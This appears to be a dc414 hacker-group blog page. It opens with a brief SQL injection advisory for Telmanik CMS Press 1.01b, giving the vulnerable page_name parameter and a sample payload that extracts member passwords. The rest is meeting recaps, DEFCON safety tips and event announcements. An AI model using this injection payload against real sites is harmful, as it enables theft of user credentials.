Telmanik CMS Press 1.01 SQLi 0day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]

you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with “_”.

Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there ๐Ÿ˜‰

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

Tips for dc414 members (and everyone else) at DEFCON21

Here are a few tips and guidelines to follow while in Vegas:

  • Keep an eye on dc414’s twitter, Facebook, and G+ feeds to keep up to date on what we are doing so you can join in on the fun.
  • If you have access to dc414’s VPN be sure to use it at all times on your tablet, phone, and laptop. If you do not have access to the VPN but have a server you can access “like one on your home connection”, set up a ssh tunnel and use it at all times.
  • Do not use USB “or CDs/DVDs” sticks from anyone, other then ones you brought your self, including ones you find on the floor or parking lot.
  • Do not leave USB sticks laying out that you intend to use later.
  • Do not let anyone connect their phone to your system for charging or any other reason.
  • Do not connect your phone/tablet to anyones computer other then yours.
  • When using the local WIFI “hotel, convention center, etc” Do not visit any site you intend to login to with the HTTP protocol “ie http://mail.dc414.org” only connect using HTTPS “ie https://mail.dc414.org”
  • Do not scan any QR codes with apps that do not verify the content before displaying it or opening other programs.
  • Do not ever leave your computer, phone, or tablet unattended

dc414 @ barcampmke7

Last years barcampmke was awesome, everyone had lots of fun and met some great people. Some of you might remember we had a little stand last year and ran the good old wall of sheep, well we liked it so much that this year we decided to become an official sponsor of barcampmke and expand our operations. This year we will not only be doing the the wall of sheep, but we will also be running a lockpick and tamper evident village, cat5 cable making couples contest, plus giving away free beer!! To get a free beer you have to either pick a lock from the village in under 2 minutes or reveal the secret message contained in a package secured with tamper evident lables, tape, lock seals, and tug tights, or beat your competitor to making a working cat5 cable! So sharpen up on your skills and win some free beer! See you at barcamp.

August meeting awesomeness

Klaiviel started us off by giving us a nice show of binary key card hotel locks popular over seas, showed us a 3d printed key for one of his locks, explained pick proof locks from the 40s that are no longer used but highly effective and how to make them today using regular locks. Then he showed us why he is the second best key impressionist in the world, and made a working key for a lock right in front of us and giving us step by step instructions on how to do it our selves.

I stepped in and gave a quick demo of how I made our new and improved donations bucket which I will be making a blog post on later. Darkwind came packing with a alfa wifi antenna hooked up to a satellite dish! This made a killer directional wifi antenna, we took it up to the roof of bucketworks and got signals from all over including the moon ๐Ÿ˜› Ngharo hooked it up to his lappy and cracked a few networks ๐Ÿ™‚

After the roof party was over and we got back down stairs Castor gave a DEFCON20 badge hacking demo and showed us how to turn our badges into any other badge type we wanted, then showed us how to make the LEDs on the badge flash out words and stuffs. Then we all just started bull shitting and talking about up coming projects.

Cmoney couldnt make it out so I took a few picture that you can view here. Congrats to darkwind and faraday for winning the dc414 free junk giveaway!!

dc414 @ DEFCON20

Most of the crew will be in Vegas for DEFCON20 this year!!! Lets all get drunk and party! I will also be getting married while there to the super awesome cmoney!! For our brothers not going, we will be doing our best to drink your share of booze ๐Ÿ™‚ I get the opportunity to speak on the DCG panel again this year so if you are at DC20 come check it out, me and other POCs will be laying down some knowledge for y’all. Also find me or other dc414 members so we can all party ๐Ÿ˜€ I will be taking lots of pictures and posting them on Twitter, Facebook, and G+ so be sure to check that shit out as well. See ya there.

May meeting recap.

May’s meeting was off the hook, one of our best yet! Lots of new faces which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave a awesome demo on sniffing pagers. Its crazy to see all the pager traffic that is still out there. Then I showed off my Arduino windows attack tool and pwned a windows 7 box, There will a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures but my phone was full of fail and didn’t save any of them ๐Ÿ™ so no pictures of the meeting this time, sorry. I promise to do better next time ๐Ÿ˜› later.

THOTCON greatness

This was the best THOTCON I have been to yet! Awesome talks, awesome beer, awesome food, and awesome people kinda sums it up for this year. Mine and ngharo’s talk went really well, and so far I have had lots of good feed back. I was a little drunk by the time we did our talk so that helped a lot, lol. My favorite talk was “Owning Payphones: 3650-Day Exploits” from savant, dude did a wonderful job and violated payphones in dirty ways! The one I learned the most from was “You put what in your DNS record?” from Mubix, yeah zone transfers are old school and I been using it for ever, but I had no idea you could do it to com and stuff, lol. Here are some pics of the swag and the con. Enjoy.

Me and ngharo giving our talk:

April fun

Aprils meeting wasn’t for fools, it was for hackers ๐Ÿ˜› It was another awesome meeting full of beer, pizza, lulz, and hacks. dw5304 got the night rolling with how to bypass windows 7 login password, then went on to talk bout how to pwn Time Warner internet! Then Klaiviel gave us a 101 style schooling on hand cuffs, tumbler, combo, and tubular locks and some others! He also covered some car locks, key impression and stuff. He explained the different picking methods and the tools of the trade. Ngharo and I topped off by giving the talk we have prepared for THOTCON! It went well but it is clear we need a little practice before the big event.

Here are some pictures from the meeting thanx to cmoney. Congrats to Klaiviel for getting so many achievements for the Lock Master badge in one night and to The Professor for winning the dc414 free junk giveaway!! He got a awesome CD/DVD/DVD-R external drive “lol”, enjoy!

Big winner of free dc414 junk ๐Ÿ™‚

dc414 meeting lulz – 2.3.12

February’s meeting was another one for the books. We had a full blown G+ hangout setup complete with a projector and a hand cam. A big thanks to bneu for providing the cam and darkwind for the capture device. I started the night off by making few bigย announcementsย about me and ngharo speaking at THOTCON and how dc414 was picked by OpenDNS as a awesome user group “more on this later”. Then dw5304 informed us of Bucketworks network and finanical situation and I’m proud to say dc414 stepped up right away. bneu is making a huge network equipment donation to Bucketworks, all dc414 donations for the night went to Bucketworks, and dc414 is going to put together a fundraiser for Bucketworks. More on all this later.

I started the presentations off with a big fail on cracking wep “ikr” I felt like a total n00b. I can do it I swear, lol. I did redeem my self by owning a VM system on a PBX by using a 0day I have “No I will not be giving out details on this, other then to those at the meeting and I will never do it again. Its mine!” I didn’t stop there, to further redeem my self I gave a little demo on fimap and opened up a shell on a live compromised server ๐Ÿ™‚ The fun wasn’t over yet. Vladimir gave us the 101 on Cat5 cable and a step by step to making your own cables. Then Vladimir and Darkwind had a cable making race and Darkwind smoked Vladimir bad! Thats not all, dw5304 replaced the back light on an old laptop, something I didn’t even know you could do. He took the screen apart and explain each step, then Vladimir schooled us on just how LCD’s and such work. Thank you every one for your hard work!

Thanks to cmoney we have tons of great pictures from our last meeting here. Congrats go out to the free dc414 junk give a way winners, Dan, Darkwind, and to Joel for winning the free THOTCON ticket.

Here is Dan and his new palm one mobile keyboard:

Darkwind and his ALFA 802.11n usb card:

Here is Joel after winning the THOTCON ticket:

Ok thats it, peace out.

WIN a free pass to THOTCON 0x3 and go with dc414!

Ngharo and I will be giving a talk at THOTCON 0x3 in April and one “maybe two” lucky dc414 member(s) are coming with us! Our talk is titled “How I fucked your grandma”. It’s about the security implications of social communication, activity/wellness monitoring and home automation technology we are putting in the homes of the elderly designed for aging in place and the risks that go with it. It should be a good time and I know a good number of other dc414 members already have tickets so im sure we will also be raising some hell as well! ๐Ÿ™‚ As a speaker I will have access to free beer….I hope our talk is early… if not I hope I’m not too wasted to stand by the time we go up, lol, and I hope to see you there!

For a chance to win a free ticket to THOTCON 0x3 just be at the next dc414 meeting, it will be part of the dc414 free junk give away.